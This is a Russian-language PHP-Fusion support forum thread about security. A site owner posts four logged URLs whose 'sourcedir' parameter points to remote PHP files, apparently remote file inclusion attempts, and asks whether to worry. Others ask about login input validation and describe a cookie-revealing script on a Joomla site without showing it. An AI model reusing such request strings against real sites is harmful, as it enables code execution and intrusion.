Забыли пароль?
Запросите новый здесь.

Автор темы: jikaka
ID темы: 1335
Информация:
Тема содержит 148 сообщения, была просмотрена 90459 раз.  Имеются прикрепленные файлы.
Просмотр темы
PHP-Fusion Russia » Поддержка 7 версии » Безопасность
 Распечатать тему
SQL-инъекция в PHP-Fusion
Pisatel
Господа, всем здравствуйте! Сегодня в логах 404 ошибок обнаружил следующее:
Скачать исходники  Код
http://www.meweb.ru/article14-sitemapxml-delaem-kartu-sayta&sa=U&ei=BuqWUeOnM4TZsgaWgYHQAQ&ved=0CJ0CEBYwTThk&usg=AFQjCNHs6wozSISlkcJWxXXHnxxfjM2owA//?sourcedir=http://ss.genua.ispgate.biz/ccs_ware/gd/fire/kun.php??
http://www.meweb.ru/article14-sitemapxml-delaem-kartu-sayta&sa=U&ei=BuqWUeOnM4TZsgaWgYHQAQ&ved=0CJ0CEBYwTThk&usg=AFQjCNHs6wozSISlkcJWxXXHnxxfjM2owA//?sourcedir=http://ss.genua.ispgate.biz/ccs_ware/gd/fire/kan.php??
http://www.meweb.ru/article14-sitemapxml-delaem-kartu-sayta&sa=U&ei=BuqWUeOnM4TZsgaWgYHQAQ&ved=0CJ0CEBYwTThk&usg=AFQjCNHs6wozSISlkcJWxXXHnxxfjM2owA//?sourcedir=http://ss.genua.ispgate.biz/ccs_ware/gd/fire/kenx.php??
http://www.meweb.ru/article14-sitemapxml-delaem-kartu-sayta&sa=U&ei=BuqWUeOnM4TZsgaWgYHQAQ&ved=0CJ0CEBYwTThk&usg=AFQjCNHs6wozSISlkcJWxXXHnxxfjM2owA//?sourcedir=http://ss.genua.ispgate.biz/ccs_ware/gd/fire/do.ini??



То есть кто-то пытался подключать внешние файлы, верно ли я понимаю? Есть ли повод для беспокойства? Инородных файлов, вроде, не обнаружил пока...
 
Web
Polarfox
Было бы куда подключать.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
 
util
Не знаю, может читали по поводу Drupal:

http://www.openne...?num=37057

И ещё, сам пока не копался, спрошу по фуджику - а ввод в поле логин проверяется?
Или по умолчанию подразумевается, что пользователь будет вводить только корректные данные?
Счастлив не тот, кто получает подарок, а тот, кто подарок делает.
 
Web
jikaka
ты имеешь ввиду при регистрации?
 
Web
util
Не только, и при заходе зареганного.
Проверяется ли и как - то, что вставляется в запрос и в базу?
Изменил(а) util, 06.06.2013 18:48
Счастлив не тот, кто получает подарок, а тот, кто подарок делает.
 
Web
Polarfox
Пусть нормально пишут, еще проверять...

А вообще с чего такие вопросы, про самое очевидное? Вроде там ничо нет про логины.
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
 
util
На сайте t*******.info (джумла) вбил в поле "поиск по сайту" некую короткую комбинацию, скрипт,
и получил сообщение - cookie: PHPSESSID=**************************,
- идентификатор сессии пользователя..

Поэтому и задал вопрос по фуджику.
Счастлив не тот, кто получает подарок, а тот, кто подарок делает.
 
Web
Polarfox
Still don't get it...

И что, с того в жумле сессия - у нас от этого логин уязвим?
Всегда делайте backup перед изменениями | Указывайте свою версию в подписи/профиле. | Вся бесплатная тех. поддержка только на форуме
 

Поделиться этой темой
Социальные закладки: Vkontakte Odnoklassniki Mail.ru Facebook Google Tweet This
URL:
BBcode:
HTML:

Перейти на форум:
Похожие темы
Топ 5 пользователей форума
Zaxap Zaxap (1,090)   Vova Vova (877)   Pisatel Pisatel (678)   util util (666)   SchreiBear SchreiBear (625)